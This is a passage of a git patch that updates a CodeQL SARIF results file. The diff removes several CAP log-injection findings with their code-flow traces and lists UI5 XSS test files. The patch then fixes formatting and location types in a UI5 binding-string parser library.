"primaryLocationLineHash" : "e05b39891dddd161:1", - "primaryLocationStartColumnFingerprint" : "40" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 15, - "startColumn" : 24, - "endColumn" : 27 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 20 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 25 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 13, - "endColumn" : 25 - } - }, - "message" : { - "text" : "$" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 47, - "endColumn" : 48 - } - }, - "message" : { - "text" : "$" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 15, - "startColumn" : 24, - "endColumn" : 27 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 174 + } }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 16, - "endColumn" : 29 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "4dc77ce4a9b7031e:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 25, - "endColumn" : 29 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 16, - "endColumn" : 29 - } - }, - "message" : { - "text" : "\"CAP:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + } }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + } }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 47 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 7, - "startColumn" : 21, - "endColumn" : 34 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 47 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 9, - "startColumn" : 38, - "endColumn" : 51 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 9, - "startColumn" : 36, - "endColumn" : 53 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 177 + } }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 47 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 7, - "startColumn" : 21, - "endColumn" : 34 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 47 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 9, - "startColumn" : 38, - "endColumn" : 51 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 9, - "startColumn" : 36, - "endColumn" : 53 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "user-provided value" - } - }, { - "id" : 2, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "qlt.conf.json", + "uriBaseId" : "%SRCROOT%", + "index" : 178 + } } ], + "results" : [ ], "newlineSequences" : [ "\r\n", "\n", "
", "
" ], "columnKind" : "utf16CodeUnits", "properties" : { - "codeqlConfigSummary" : { - "disableDefaultQueries" : false, - "queries" : [ { - "type" : "builtinSuite", - "uses" : "security-extended" - }, { - "type" : "localQuery", - "uses" : "./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls" - }, { - "type" : "localQuery", - "uses" : "./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls" - } ] - }, + "semmle.formatSpecifier" : "sarif-latest", "metricResults" : [ { "rule" : { "id" : "js/summary/lines-of-code", - "index" : 101, + "index" : 100, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "ruleId" : "js/summary/lines-of-code", - "value" : 2973 + "value" : 480 }, { "rule" : { "id" : "js/summary/lines-of-user-code", - "index" : 102, + "index" : 101, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "ruleId" : "js/summary/lines-of-user-code", - "value" : 2973, + "value" : 480, "baseline" : 0 } ], - "semmle.formatSpecifier" : "sarif-latest" + "codeqlConfigSummary" : { + "disableDefaultQueries" : false, + "queries" : [ { + "type" : "builtinSuite", + "uses" : "security-extended" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls" + } ] + } } } ] } \ No newline at end of file From 9c7b40c472f35df0044070098e5344e3ed4b7d10 Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 21:56:10 +0200 Subject: [PATCH 14/15] Fix BindingStringParser test --- .../frameworks/ui5/BindingStringParser.qll | 10 ++++++---- .../javascript/frameworks/ui5/Bindings.qll | 10 +++++----- .../BindingStringParser/BindingStringParser.ql | 16 ++++------------ 3 files changed, 15 insertions(+), 21 deletions(-) diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/BindingStringParser.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/BindingStringParser.qll index 73ed3e77d..2dcb2293a 100644 --- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/BindingStringParser.qll +++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/BindingStringParser.qll @@ -2,7 +2,8 @@ import javascript as stdlib signature class BindingStringReaderSig { string getBindingString(); - stdlib::Location getLocation(); + + stdlib::DbLocation getLocation(); // Get a dataflow node associated with the binding string, if any. // Note that not all location from which we can obtain a binding string @@ -51,7 +52,8 @@ module BindingStringParser { value = ":" } or MkNumberToken(int begin, int end, string value, BindingStringReader reader) { - value = reader.getBindingString().regexpFind("-?[1-9]\\d*(\\.\\d+)?((e|E)?(\\+|-)?\\d+)?", _, begin) and + value = + reader.getBindingString().regexpFind("-?[1-9]\\d*(\\.\\d+)?((e|E)?(\\+|-)?\\d+)?", _, begin) and begin + value.length() - 1 = end } or MkStringToken(int begin, int end, string value, BindingStringReader reader) { @@ -95,9 +97,9 @@ module BindingStringParser { .getBindingString() .regexpFind("(?:#|#@)?(?:[a-zA-Z][a-zA-Z0-9_]*|[a-zA-Z0-9][a-zA-Z0-9_]:[a-zA-Z0-9_]+)(?:\\([^\\)]*\\))?", _, begin) and - begin + value.length() - 1 = end + begin + value.length() - 1 = end and // exclude keyword - and not value in ["true", "false", "null"] + not value in ["true", "false", "null"] } or MkGreaterThanToken(int begin, int end, string value, BindingStringReader reader) { begin = reader.getBindingString().indexOf(">") and diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll index dacd411c4..032d41a87 100644 --- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll +++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll @@ -60,7 +60,7 @@ private class BindingStringReader extends TBindingString { ) } - Location getLocation() { + DbLocation getLocation() { exists(StringLiteral stringLiteral | this = 